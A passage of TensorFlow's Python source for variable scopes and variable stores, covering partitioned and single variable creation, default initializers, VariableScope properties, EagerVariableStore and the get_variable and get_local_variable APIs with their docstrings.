initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with them, so no traceback.
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape is not None and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(
1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
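A minimal sketch of the dispatch, using this module's internal store
directly (illustrative only; normally this is reached via `get_variable`):
```python
store = _VariableStore()
init, from_value = store._get_default_initializer("w", dtype=dtypes.float32)
# init is a glorot_uniform_initializer; from_value is False.
init, from_value = store._get_default_initializer("i", dtype=dtypes.int32)
# init is a zeros_initializer; from_value is False.
store._get_default_initializer("c", dtype=dtypes.complex64)  # raises ValueError
```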
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTE: DT_STRING is handled above; do we also need to support DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
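A minimal usage sketch (graph mode; the scope name and initializer below are
illustrative only):
```python
with tf.compat.v1.variable_scope(
    "conv", initializer=tf.compat.v1.zeros_initializer()):
  scope = tf.compat.v1.get_variable_scope()
  # scope.name == "conv" when opened at the top level.
  scope.reuse_variables()  # later get_variable calls in this scope reuse
```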
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
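"""Increments the usage count for `scope_name`."""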
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
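"""Resets usage counts for all subscopes of `scope_name` (all scopes if None)."""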
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
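"""Returns the `_VariableStore` for the current graph, creating it if needed."""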
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
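"""Context manager that temporarily installs `store` as the default store."""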
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled, Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```python
container = tfe.EagerVariableStore()
for input in dataset_iterator:
  with container.as_default():
    x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables())  # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
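A minimal usage sketch (`container` as in the class docstring above):
```python
snapshot = container.copy()
# Updates made through `container` no longer affect `snapshot`'s variables.
```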
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
# Copy rather than mutate the caller's list in place.
collections = list(collections) + [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
